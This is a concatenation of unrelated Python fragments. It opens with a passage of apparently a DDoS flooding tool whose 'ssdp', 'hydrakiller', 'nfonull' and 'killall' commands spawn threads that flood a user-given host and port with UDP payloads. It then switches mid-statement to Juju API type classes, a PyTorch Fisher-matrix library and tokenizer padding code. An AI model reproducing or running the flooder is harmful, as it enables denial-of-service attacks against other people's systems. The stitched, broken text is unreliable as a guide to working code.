print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "ssdp":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "hydrakiller":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "nfonull":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "killall":
try:
if running >= 1000:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
payload = b"\x00\x02\x00\x2f"
threading.Thread(target=stdsender, args=(host, port, timer, payload)).start()
os.system('cls')
print("\033[97m[-] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[\] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[|] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack....")
time.sleep(1)
os.system('cls')
print("\033[97m[+] Sending Attack...")
time.sleep(1)
os.system('cls')
print("\033[97m[-] Sending Attack..")
time.sleep(1)
os.system('cls')
print("\033[97m[/] Sending Attack.")
time.sleep(1)
os.system('cls')
print("\033[97m[INFO] Floading Sent Successfully")
time.sleep(3)
os.system('cls')
print(attacked)
except ValueError:
main()
except socket.gaierror:
main()
elif | |
str
value : str
'''
address_ = Address.from_json(address) if address else None
port_ = port
scope_ = scope
space_id_ = space_id
space_name_ = space_name
type__ = type_
value_ = value
# Validate arguments against known Juju API types.
if address_ is not None and not isinstance(address_, (dict, Address)):
raise Exception("Expected address_ to be a Address, received: {}".format(type(address_)))
if port_ is not None and not isinstance(port_, int):
raise Exception("Expected port_ to be a int, received: {}".format(type(port_)))
if scope_ is not None and not isinstance(scope_, (bytes, str)):
raise Exception("Expected scope_ to be a str, received: {}".format(type(scope_)))
if space_id_ is not None and not isinstance(space_id_, (bytes, str)):
raise Exception("Expected space_id_ to be a str, received: {}".format(type(space_id_)))
if space_name_ is not None and not isinstance(space_name_, (bytes, str)):
raise Exception("Expected space_name_ to be a str, received: {}".format(type(space_name_)))
if type__ is not None and not isinstance(type__, (bytes, str)):
raise Exception("Expected type__ to be a str, received: {}".format(type(type__)))
if value_ is not None and not isinstance(value_, (bytes, str)):
raise Exception("Expected value_ to be a str, received: {}".format(type(value_)))
self.address = address_
self.port = port_
self.scope = scope_
self.space_id = space_id_
self.space_name = space_name_
self.type_ = type__
self.value = value_
self.unknown_fields = unknown_fields
class HostedModelConfig(Type):
_toSchema = {'cloud_spec': 'cloud-spec', 'config': 'config', 'error': 'error', 'name': 'name', 'owner': 'owner'}
_toPy = {'cloud-spec': 'cloud_spec', 'config': 'config', 'error': 'error', 'name': 'name', 'owner': 'owner'}
def __init__(self, cloud_spec=None, config=None, error=None, name=None, owner=None, **unknown_fields):
'''
cloud_spec : CloudSpec
config : typing.Mapping[str, typing.Any]
error : Error
name : str
owner : str
'''
cloud_spec_ = CloudSpec.from_json(cloud_spec) if cloud_spec else None
config_ = config
error_ = Error.from_json(error) if error else None
name_ = name
owner_ = owner
# Validate arguments against known Juju API types.
if cloud_spec_ is not None and not isinstance(cloud_spec_, (dict, CloudSpec)):
raise Exception("Expected cloud_spec_ to be a CloudSpec, received: {}".format(type(cloud_spec_)))
if config_ is not None and not isinstance(config_, dict):
raise Exception("Expected config_ to be a Mapping, received: {}".format(type(config_)))
if error_ is not None and not isinstance(error_, (dict, Error)):
raise Exception("Expected error_ to be a Error, received: {}".format(type(error_)))
if name_ is not None and not isinstance(name_, (bytes, str)):
raise Exception("Expected name_ to be a str, received: {}".format(type(name_)))
if owner_ is not None and not isinstance(owner_, (bytes, str)):
raise Exception("Expected owner_ to be a str, received: {}".format(type(owner_)))
self.cloud_spec = cloud_spec_
self.config = config_
self.error = error_
self.name = name_
self.owner = owner_
self.unknown_fields = unknown_fields
class HostedModelConfigsResults(Type):
_toSchema = {'models': 'models'}
_toPy = {'models': 'models'}
def __init__(self, models=None, **unknown_fields):
'''
models : typing.Sequence[~HostedModelConfig]
'''
models_ = [HostedModelConfig.from_json(o) for o in models or []]
# Validate arguments against known Juju API types.
if models_ is not None and not isinstance(models_, (bytes, str, list)):
raise Exception("Expected models_ to be a Sequence, received: {}".format(type(models_)))
self.models = models_
self.unknown_fields = unknown_fields
class ImageFilterParams(Type):
_toSchema = {'images': 'images'}
_toPy = {'images': 'images'}
def __init__(self, images=None, **unknown_fields):
'''
images : typing.Sequence[~ImageSpec]
'''
images_ = [ImageSpec.from_json(o) for o in images or []]
# Validate arguments against known Juju API types.
if images_ is not None and not isinstance(images_, (bytes, str, list)):
raise Exception("Expected images_ to be a Sequence, received: {}".format(type(images_)))
self.images = images_
self.unknown_fields = unknown_fields
class ImageMetadata(Type):
_toSchema = {'arch': 'arch', 'created': 'created', 'kind': 'kind', 'series': 'series', 'url': 'url'}
_toPy = {'arch': 'arch', 'created': 'created', 'kind': 'kind', 'series': 'series', 'url': 'url'}
def __init__(self, arch=None, created=None, kind=None, series=None, url=None, **unknown_fields):
'''
arch : str
created : str
kind : str
series : str
url : str
'''
arch_ = arch
created_ = created
kind_ = kind
series_ = series
url_ = url
# Validate arguments against known Juju API types.
if arch_ is not None and not isinstance(arch_, (bytes, str)):
raise Exception("Expected arch_ to be a str, received: {}".format(type(arch_)))
if created_ is not None and not isinstance(created_, (bytes, str)):
raise Exception("Expected created_ to be a str, received: {}".format(type(created_)))
if kind_ is not None and not isinstance(kind_, (bytes, str)):
raise Exception("Expected kind_ to be a str, received: {}".format(type(kind_)))
if series_ is not None and not isinstance(series_, (bytes, str)):
raise Exception("Expected series_ to be a str, received: {}".format(type(series_)))
if url_ is not None and not isinstance(url_, (bytes, str)):
raise Exception("Expected url_ to be a str, received: {}".format(type(url_)))
self.arch = arch_
self.created = created_
self.kind = kind_
self.series = series_
self.url = url_
self.unknown_fields = unknown_fields
class ImageMetadataFilter(Type):
_toSchema = {'arches': 'arches', 'region': 'region', 'root_storage_type': 'root-storage-type', 'series': 'series', 'stream': 'stream', 'virt_type': 'virt-type'}
_toPy = {'arches': 'arches', 'region': 'region', 'root-storage-type': 'root_storage_type', 'series': 'series', 'stream': 'stream', 'virt-type': 'virt_type'}
def __init__(self, arches=None, region=None, root_storage_type=None, series=None, stream=None, virt_type=None, **unknown_fields):
'''
arches : typing.Sequence[str]
region : str
root_storage_type : str
series : typing.Sequence[str]
stream : str
virt_type : str
'''
arches_ = arches
region_ = region
root_storage_type_ = root_storage_type
series_ = series
stream_ = stream
virt_type_ = virt_type
# Validate arguments against known Juju API types.
if arches_ is not None and not isinstance(arches_, (bytes, str, list)):
raise Exception("Expected arches_ to be a Sequence, received: {}".format(type(arches_)))
if region_ is not None and not isinstance(region_, (bytes, str)):
raise Exception("Expected region_ to be a str, received: {}".format(type(region_)))
if root_storage_type_ is not None and not isinstance(root_storage_type_, (bytes, str)):
raise Exception("Expected root_storage_type_ to be a str, received: {}".format(type(root_storage_type_)))
if series_ is not None and not isinstance(series_, (bytes, str, list)):
raise Exception("Expected series_ to be a Sequence, received: {}".format(type(series_)))
if stream_ is not None and not isinstance(stream_, (bytes, str)):
raise Exception("Expected stream_ to be a str, received: {}".format(type(stream_)))
if virt_type_ is not None and not isinstance(virt_type_, (bytes, str)):
raise Exception("Expected virt_type_ to be a str, received: {}".format(type(virt_type_)))
self.arches = arches_
self.region = region_
self.root_storage_type = root_storage_type_
self.series = series_
self.stream = stream_
self.virt_type = virt_type_
self.unknown_fields = unknown_fields
class ImageSpec(Type):
_toSchema = {'arch': 'arch', 'kind': 'kind', 'series': 'series'}
_toPy = {'arch': 'arch', 'kind': 'kind', 'series': 'series'}
def __init__(self, arch=None, kind=None, series=None, **unknown_fields):
'''
arch : str
kind : str
series : str
'''
arch_ = arch
kind_ = kind
series_ = series
# Validate arguments against known Juju API types.
if arch_ is not None and not isinstance(arch_, (bytes, str)):
raise Exception("Expected arch_ to be a str, received: {}".format(type(arch_)))
if kind_ is not None and not isinstance(kind_, (bytes, str)):
raise Exception("Expected kind_ to be a str, received: {}".format(type(kind_)))
if series_ is not None and not isinstance(series_, (bytes, str)):
raise Exception("Expected series_ to be a str, received: {}".format(type(series_)))
self.arch = arch_
self.kind = kind_
self.series = series_
self.unknown_fields = unknown_fields
class ImportStorageDetails(Type):
_toSchema = {'storage_tag': 'storage-tag'}
_toPy = {'storage-tag': 'storage_tag'}
def __init__(self, storage_tag=None, **unknown_fields):
'''
storage_tag : str
'''
storage_tag_ = storage_tag
# Validate arguments against known Juju API types.
if storage_tag_ is not None and not isinstance(storage_tag_, (bytes, str)):
raise Exception("Expected storage_tag_ to be a str, received: {}".format(type(storage_tag_)))
self.storage_tag = storage_tag_
self.unknown_fields = unknown_fields
class ImportStorageParams(Type):
_toSchema = {'kind': 'kind', 'pool': 'pool', 'provider_id': 'provider-id', 'storage_name': 'storage-name'}
_toPy = {'kind': 'kind', 'pool': 'pool', 'provider-id': 'provider_id', 'storage-name': 'storage_name'}
def __init__(self, kind=None, pool=None, provider_id=None, storage_name=None, **unknown_fields):
'''
kind : int
pool : str
provider_id : str
storage_name : str
'''
kind_ = kind
pool_ = pool
provider_id_ = provider_id
storage_name_ = storage_name
# Validate arguments against known Juju API types.
if kind_ is not None and not isinstance(kind_, int):
raise Exception("Expected kind_ to be a int, received: {}".format(type(kind_)))
if pool_ is not None and not isinstance(pool_, (bytes, str)):
raise Exception("Expected pool_ to be a str, received: {}".format(type(pool_)))
if provider_id_ is not None and not isinstance(provider_id_, (bytes, str)):
raise Exception("Expected provider_id_ to be a str, received: {}".format(type(provider_id_)))
if storage_name_ is not None and not isinstance(storage_name_, (bytes, str)):
raise Exception("Expected storage_name_ to be a str, received: {}".format(type(storage_name_)))
self.kind = kind_
self.pool = pool_
self.provider_id = provider_id_
self.storage_name = storage_name_
self.unknown_fields = unknown_fields
class ImportStorageResult(Type):
_toSchema = {'error': 'error', 'result': 'result'}
_toPy = {'error': 'error', 'result': 'result'}
def __init__(self, error=None, result=None, **unknown_fields):
'''
error : Error
result : ImportStorageDetails
'''
error_ = Error.from_json(error) if error else None
result_ = ImportStorageDetails.from_json(result) if | |
<gh_stars>0
from contextlib import contextmanager
import numpy as np
import torch
import torch.nn.functional as F
from .core import extend
from .utils import disable_param_grad
from .gradient import data_loader_gradient
from .operations import *
from .symmatrix import SymMatrix, Kron, Diag, UnitWise
from .matrices import *
from .mvp import power_method, conjugate_gradient_method
_SHAPE_TO_OP = {
SHAPE_FULL: OP_BATCH_GRADS, # full
SHAPE_BLOCK_DIAG: OP_BATCH_GRADS, # block-diagonal
SHAPE_KRON: OP_COV_KRON, # Kronecker-factored
SHAPE_DIAG: OP_COV_DIAG, # diagonal
}
_COV_FULL = 'cov_full'
_CVP_FULL = 'cvp_full'
_COV_BLOCK_DIAG = 'cov_block_diag'
_CVP_BLOCK_DIAG = 'cvp_block_diag'
__all__ = [
'fisher_for_cross_entropy',
'fvp_for_cross_entropy',
'zero_fisher',
'zero_fvp',
'fisher_for_cross_entropy_eigenvalues',
'fisher_free_for_cross_entropy',
'woodbury_ifvp'
]
_supported_types = [FISHER_EXACT, FISHER_MC, COV]
_supported_types_for_eig = _supported_types
_supported_shapes = [SHAPE_FULL, SHAPE_BLOCK_DIAG, SHAPE_KRON, SHAPE_DIAG]
_supported_shapes_for_eig = [SHAPE_FULL, SHAPE_BLOCK_DIAG]
def fisher_for_cross_entropy(
model,
fisher_types,
fisher_shapes,
inputs=None,
targets=None,
data_loader=None,
stats_name=None,
compute_param_grad=False,
n_mc_samples=1,
is_distributed=False,
all_reduce=False,
is_master=True,
matrix_manager=None,
):
if isinstance(fisher_types, str):
fisher_types = [fisher_types]
if isinstance(fisher_shapes, str):
fisher_shapes = [fisher_shapes]
# remove duplicates
fisher_types = set(fisher_types)
fisher_shapes = set(fisher_shapes)
for ftype in fisher_types:
assert ftype in _supported_types, \
f'Invalid fisher_type: {ftype}. ' \
f'fisher_type must be in {_supported_types}.'
for fshape in fisher_shapes:
assert fshape in _supported_shapes, \
f'Invalid fisher_shape: {fshape}. ' \
f'fisher_shape must be in {_supported_shapes}.'
zero_fisher(model, fisher_types)
# setup operations for mammoth_utils.autograd.extend
op_names = [_SHAPE_TO_OP[shape] for shape in fisher_shapes]
if compute_param_grad:
assert COV in fisher_types, \
f'"{COV}" must be in fisher_types when compute_param_grad is True.'
if data_loader is not None:
op_names.append(OP_ACCUMULATE_GRADS) # accumulate gradient
# setup matrix manager as needed
if matrix_manager is None:
matrix_manager = MatrixManager(model, fisher_types)
kwargs = dict(
compute_full_fisher=SHAPE_FULL in fisher_shapes,
compute_block_diag_fisher=SHAPE_BLOCK_DIAG in fisher_shapes,
compute_param_grad=compute_param_grad,
n_mc_samples=n_mc_samples
)
if data_loader is not None:
# accumulate fisher for an epoch
device = next(model.parameters()).device
for inputs, targets in data_loader:
inputs, targets = inputs.to(device), targets.to(device)
with extend(model, op_names):
_fisher_for_cross_entropy(
model, fisher_types, inputs, targets, **kwargs
)
if stats_name is not None:
matrix_manager.accumulate_matrices(stats_name)
if compute_param_grad:
data_loader_gradient(
model,
data_loader,
has_accumulated=True,
is_distributed=is_distributed,
all_reduce=all_reduce,
is_master=is_master
)
else:
# compute fisher for a single batch
assert inputs is not None
with extend(model, op_names):
_fisher_for_cross_entropy(
model, fisher_types, inputs, targets, **kwargs
)
# reduce matrices
if is_distributed:
matrix_manager.reduce_matrices(stats_name, is_master, all_reduce)
return matrix_manager
def zero_fisher(module, fisher_types):
for child in module.children():
zero_fisher(child, fisher_types)
for ftype in fisher_types:
if hasattr(module, ftype):
delattr(module, ftype)
def zero_fvp(module, fisher_types):
for child in module.children():
zero_fvp(child, fisher_types)
for ftype in fisher_types:
attr = _get_fvp_attr(ftype)
if hasattr(module, attr):
delattr(module, attr)
def _check_fisher_type_shape(fisher_type, fisher_shape):
assert fisher_type in _supported_types_for_eig, \
f'Invalid fisher_type: {fisher_type}. ' \
f'fisher_type must be in {_supported_types_for_eig}.'
assert fisher_shape in _supported_shapes_for_eig, \
f'Invalid fisher_shape: {fisher_shape}. ' \
f'fisher_shape must be in {_supported_shapes_for_eig}.'
def fisher_for_cross_entropy_eigenvalues(
model,
fisher_type,
fisher_shape,
data_loader=None,
inputs=None,
targets=None,
n_mc_samples=1,
top_n=1,
max_iters=100,
tol=1e-3,
is_distributed=False,
print_progress=False
):
_check_fisher_type_shape(fisher_type, fisher_shape)
def fvp_fn(vec, x, y):
return fvp_for_cross_entropy(vec,
model,
fisher_type,
fisher_shape,
inputs=x,
targets=y,
n_mc_samples=n_mc_samples)
# for making MC samplings at each iteration deterministic
random_seed = torch.rand(1) * 100 if fisher_type == FISHER_MC else None
eigvals, eigvecs = power_method(fvp_fn,
model,
data_loader=data_loader,
inputs=inputs,
targets=targets,
top_n=top_n,
max_iters=max_iters,
tol=tol,
is_distributed=is_distributed,
print_progress=print_progress,
random_seed=random_seed
)
return eigvals, eigvecs
def fisher_free_for_cross_entropy(
model,
b,
fisher_type,
fisher_shape,
data_loader=None,
inputs=None,
targets=None,
init_x=None,
damping=1e-3,
n_mc_samples=1,
max_iters=None,
tol=1e-8,
preconditioner=None,
is_distributed=False,
print_progress=False,
random_seed=None,
save_log=False
):
_check_fisher_type_shape(fisher_type, fisher_shape)
def fvp_fn(vec, x, y):
return fvp_for_cross_entropy(vec,
model,
fisher_type,
fisher_shape,
inputs=x,
targets=y,
n_mc_samples=n_mc_samples)
# for making MC samplings at each iteration deterministic
if fisher_type == FISHER_MC and random_seed is None:
random_seed = int(torch.rand(1) * 100)
return conjugate_gradient_method(fvp_fn,
b,
data_loader=data_loader,
inputs=inputs,
targets=targets,
init_x=init_x,
damping=damping,
max_iters=max_iters,
tol=tol,
preconditioner=preconditioner,
is_distributed=is_distributed,
print_progress=print_progress,
random_seed=random_seed,
save_log=save_log)
def fvp_for_cross_entropy(
vec,
model,
fisher_type,
fisher_shape,
inputs,
targets=None,
n_mc_samples=1
):
compute_full_fvp = compute_block_diag_fvp = False
if fisher_shape == SHAPE_FULL:
compute_full_fvp = True
elif fisher_shape == SHAPE_BLOCK_DIAG:
compute_block_diag_fvp = True
else:
raise ValueError(f'Invalid fisher_shape: {fisher_shape}.')
zero_fvp(model, [fisher_type])
with extend(model, OP_BATCH_GRADS):
_fisher_for_cross_entropy(
model, [fisher_type],
inputs,
targets,
compute_full_fvp=compute_full_fvp,
compute_block_diag_fvp=compute_block_diag_fvp,
vec=vec,
n_mc_samples=n_mc_samples
)
if fisher_shape == SHAPE_FULL:
return getattr(model, _get_fvp_attr(fisher_type))
else:
rst = []
for module in model.modules():
fvp = getattr(module, _get_fvp_attr(fisher_type), None)
if fvp is not None:
rst.extend(fvp)
return rst
def _fisher_for_cross_entropy(
model,
fisher_types,
inputs,
targets=None,
compute_param_grad=False,
compute_full_fisher=False,
compute_full_fvp=False,
compute_block_diag_fisher=False,
compute_block_diag_fvp=False,
vec=None,
n_mc_samples=1
):
logits = model(inputs)
log_probs = F.log_softmax(logits, dim=1)
probs = None
def loss_and_backward(target):
model.zero_grad(set_to_none=True)
loss = F.nll_loss(log_probs, target, reduction='sum')
loss.backward(retain_graph=True)
if compute_full_fisher:
_full_covariance(model)
if compute_full_fvp:
_full_cvp(model, vec)
if compute_block_diag_fisher:
_block_diag_covariance(model)
if compute_block_diag_fvp:
_block_diag_cvp(model, vec)
if FISHER_MC in fisher_types:
probs = F.softmax(logits, dim=1)
_fisher_mc(loss_and_backward, model, probs, n_mc_samples)
if FISHER_EXACT in fisher_types:
if probs is None:
probs = F.softmax(logits, dim=1)
_fisher_exact(loss_and_backward, model, probs)
if COV in fisher_types:
assert targets is not None, 'targets must be specified for computing covariance.'
_covariance(loss_and_backward, model, targets, compute_param_grad)
def _module_batch_grads(model):
rst = []
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
batch_grads = operation.get_op_results()[OP_BATCH_GRADS]
rst.append((module, batch_grads))
return rst
def _module_batch_flatten_grads(model):
rst = []
for module, batch_grads in _module_batch_grads(model):
batch_flatten_grads = torch.cat(
[g.flatten(start_dim=1) for g in batch_grads.values()],
dim=1
)
rst.append((module, batch_flatten_grads))
return rst
def _module_batch_gvp(model, vec):
rst = []
pointer = 0
for module, batch_grads in _module_batch_grads(model):
batch_gvp = None
for b_g in batch_grads.values():
v = vec[pointer]
b_gvp = b_g.mul(v.unsqueeze(0)).flatten(start_dim=1).sum(1) # n
if batch_gvp is None:
batch_gvp = b_gvp
else:
batch_gvp += b_gvp
pointer += 1
rst.append((module, batch_gvp))
assert pointer == len(vec)
return rst
def _full_covariance(model):
batch_all_g = []
for _, batch_g in _module_batch_flatten_grads(model):
batch_all_g.append(batch_g)
batch_all_g = torch.cat(batch_all_g, dim=1) # n x p_all
cov_full = torch.matmul(batch_all_g.T, batch_all_g) # p_all x p_all
setattr(model, _COV_FULL, cov_full)
def _block_diag_covariance(model):
for module, batch_g in _module_batch_flatten_grads(model):
cov_block = torch.matmul(batch_g.T, batch_g) # p_all x p_all
setattr(module, _COV_BLOCK_DIAG, cov_block)
def _full_cvp(model, vec):
"""
g: n x p
v: p
c = sum[gg^t]: p x p
cvp = sum[gg^t]v = sum[g(g^t)v]: p
"""
# compute batched (g^t)v
batch_all_gvp = None
for module, batch_gvp in _module_batch_gvp(model, vec):
if batch_all_gvp is None:
batch_all_gvp = batch_gvp
else:
batch_all_gvp += batch_gvp
# compute cvp = sum[g(g^t)v]
cvp = []
for module, batch_grads in _module_batch_grads(model):
for b_g in batch_grads.values():
cvp.append(torch.einsum('n...,n->...', b_g, batch_all_gvp))
setattr(model, _CVP_FULL, cvp)
def _block_diag_cvp(model, vec):
"""
g: n x p
v: p
c = sum[gg^t]: p x p
cvp = sum[gg^t]v = sum[g(g^t)v]: p
"""
batch_gvp_dict = {k: v for k, v in _module_batch_gvp(model, vec)}
for module, batch_grads in _module_batch_grads(model):
cvp = []
# compute cvp = sum[g(g^t)v]
batch_gvp = batch_gvp_dict[module]
for b_g in batch_grads.values():
cvp.append(torch.einsum('n...,n->...', b_g, batch_gvp))
setattr(module, _CVP_BLOCK_DIAG, cvp)
def _fisher_mc(loss_and_backward, model, probs, n_mc_samples=1):
dist = torch.distributions.Categorical(probs)
_targets = dist.sample((n_mc_samples, ))
for i in range(n_mc_samples):
loss_and_backward(_targets[i])
_register_fisher(
model,
FISHER_MC,
scale=1 / n_mc_samples,
accumulate=True
)
def _fisher_exact(loss_and_backward, model, probs):
_, n_classes = probs.shape
probs, _targets = torch.sort(probs, dim=1, descending=True)
sqrt_probs = torch.sqrt(probs)
for i in range(n_classes):
with _grads_scale(model, sqrt_probs[:, i]):
loss_and_backward(_targets[:, i])
_register_fisher(
model, FISHER_EXACT, accumulate=True
)
def _covariance(loss_and_backward, model, targets, compute_param_grad=False):
if compute_param_grad:
loss_and_backward(targets)
else:
with disable_param_grad(model):
loss_and_backward(targets)
_register_fisher(model, COV)
@contextmanager
def _grads_scale(model, scale):
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
operation.grads_scale = scale
yield
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
operation.grads_scale = None
def _register_fisher(model, fisher_type, scale=1., accumulate=False):
"""
module.fisher_{fisher_type} = op_results
op_results = {
'diag': {'weight': torch.Tensor, 'bias': torch.Tensor},
'kron': {'A': torch.Tensor, 'B': torch.Tensor},
'block_diag': torch.Tensor,
'unit_wise': torch.Tensor,
}
"""
device = next(model.parameters()).device
for module in model.modules():
operation = getattr(module, 'operation', None)
if operation is None:
continue
op_results = operation.get_op_results()
kron = diag = unit = None
if OP_COV_KRON in op_results:
rst = op_results[OP_COV_KRON]
kron = Kron(rst['A'], rst['B'], device=device)
if OP_COV_DIAG in op_results:
rst = op_results[OP_COV_DIAG]
diag = Diag(
rst.get('weight', None), rst.get('bias', None), device=device
)
if OP_COV_UNIT_WISE in op_results:
rst = op_results[OP_COV_UNIT_WISE]
unit = UnitWise(rst, device=device)
operation.clear_op_results()
# move block_diag/kron/diag fisher
_accumulate_fisher(
module,
_COV_BLOCK_DIAG,
fisher_type,
kron=kron,
diag=diag,
unit=unit,
scale=scale,
accumulate=accumulate
)
# move block_diag fvp
_accumulate_fvp(
module, _CVP_BLOCK_DIAG, fisher_type, scale, accumulate
)
# move full fisher
_accumulate_fisher(
model, _COV_FULL, fisher_type, scale=scale, accumulate=accumulate
)
# move full fvp
_accumulate_fvp(model, _CVP_FULL, fisher_type, scale, accumulate)
def _accumulate_fisher(
module,
data_src_attr,
dst_attr,
kron=None,
diag=None,
unit=None,
scale=1.,
accumulate=False
):
data = getattr(module, data_src_attr, None)
if all(v is None for v in [data, kron, diag, unit]):
return
device = next(module.parameters()).device
fisher = SymMatrix(data, kron, diag, unit, device=device)
fisher.scaling(scale)
dst_fisher = getattr(module, dst_attr, None)
if (dst_fisher is None) or (not accumulate):
setattr(module, dst_attr, fisher)
else:
# accumulate fisher
dst_fisher += fisher
if dst_fisher.has_kron:
# not accumulate kron.A
dst_fisher.kron.A = fisher.kron.A
setattr(module, dst_attr, dst_fisher)
if data is not None:
delattr(module, data_src_attr)
def _accumulate_fvp(module, src_attr, fisher_type, scale=1., accumulate=False):
dst_attr = _get_fvp_attr(fisher_type)
cvp = getattr(module, | |
= None,
num_tokens_to_remove: int = 0,
truncation_strategy: Union[str, TruncationStrategy] = "longest_first",
stride: int = 0,
) -> Tuple[List[int], List[int], List[int]]:
if num_tokens_to_remove <= 0:
return ids, pair_ids, []
if not isinstance(truncation_strategy, TruncationStrategy):
truncation_strategy = TruncationStrategy(truncation_strategy)
overflowing_tokens = []
if truncation_strategy == TruncationStrategy.LONGEST_FIRST:
for _ in range(num_tokens_to_remove):
if pair_ids is None or len(ids) > len(pair_ids):
if not overflowing_tokens:
window_len = min(len(ids), stride + 1)
else:
window_len = 1
overflowing_tokens.extend(ids[-window_len:])
ids = ids[:-1]
else:
if not overflowing_tokens:
window_len = min(len(pair_ids), stride + 1)
else:
window_len = 1
overflowing_tokens.extend(pair_ids[-window_len:])
pair_ids = pair_ids[:-1]
elif truncation_strategy == TruncationStrategy.ONLY_FIRST:
if len(ids) > num_tokens_to_remove:
window_len = min(len(ids), stride + num_tokens_to_remove)
overflowing_tokens = ids[-window_len:]
ids = ids[:-num_tokens_to_remove]
else:
logger.error(
f"We need to remove {num_tokens_to_remove} to truncate the input"
f"but the first sequence has a length {len(ids)}. "
f"Please select another truncation strategy than {truncation_strategy}, "
f"for instance 'longest_first' or 'only_second'."
)
elif truncation_strategy == TruncationStrategy.ONLY_SECOND and pair_ids is not None:
if len(pair_ids) > num_tokens_to_remove:
window_len = min(len(pair_ids), stride + num_tokens_to_remove)
overflowing_tokens = pair_ids[-window_len:]
pair_ids = pair_ids[:-num_tokens_to_remove]
else:
logger.error(
f"We need to remove {num_tokens_to_remove} to truncate the input"
f"but the second sequence has a length {len(pair_ids)}. "
f"Please select another truncation strategy than {truncation_strategy}, "
f"for instance 'longest_first' or 'only_first'."
)
return (ids, pair_ids, overflowing_tokens)
def _pad(
self,
encoded_inputs: Union[Dict[str, EncodedInput], BatchEncoding],
max_length: Optional[int] = None,
padding_strategy: PaddingStrategy = PaddingStrategy.DO_NOT_PAD,
pad_to_multiple_of: Optional[int] = None,
return_attention_mask: Optional[bool] = None,
) -> dict:
# Load from model defaults
if return_attention_mask is None:
return_attention_mask = "attention_mask" in self.model_input_names
if padding_strategy == PaddingStrategy.LONGEST:
max_length = len(encoded_inputs["input_ids"])
if max_length is not None and pad_to_multiple_of is not None and (max_length % pad_to_multiple_of != 0):
max_length = ((max_length // pad_to_multiple_of) + 1) * pad_to_multiple_of
needs_to_be_padded = (
padding_strategy != PaddingStrategy.DO_NOT_PAD and len(encoded_inputs["input_ids"]) != max_length
)
if needs_to_be_padded:
difference = max_length - len(encoded_inputs["input_ids"])
if self.padding_side == "right":
if return_attention_mask:
encoded_inputs["attention_mask"] = [1] * len(encoded_inputs["input_ids"]) + [0] * difference
if "token_type_ids" in encoded_inputs:
encoded_inputs["token_type_ids"] = (
encoded_inputs["token_type_ids"] + [self.pad_token_type_id] * difference
)
if "special_tokens_mask" in encoded_inputs:
encoded_inputs["special_tokens_mask"] = encoded_inputs["special_tokens_mask"] + [1] * difference
encoded_inputs["input_ids"] = encoded_inputs["input_ids"] + [self.pad_token_id] * difference
elif self.padding_side == "left":
if return_attention_mask:
encoded_inputs["attention_mask"] = [0] * difference + [1] * len(encoded_inputs["input_ids"])
if "token_type_ids" in encoded_inputs:
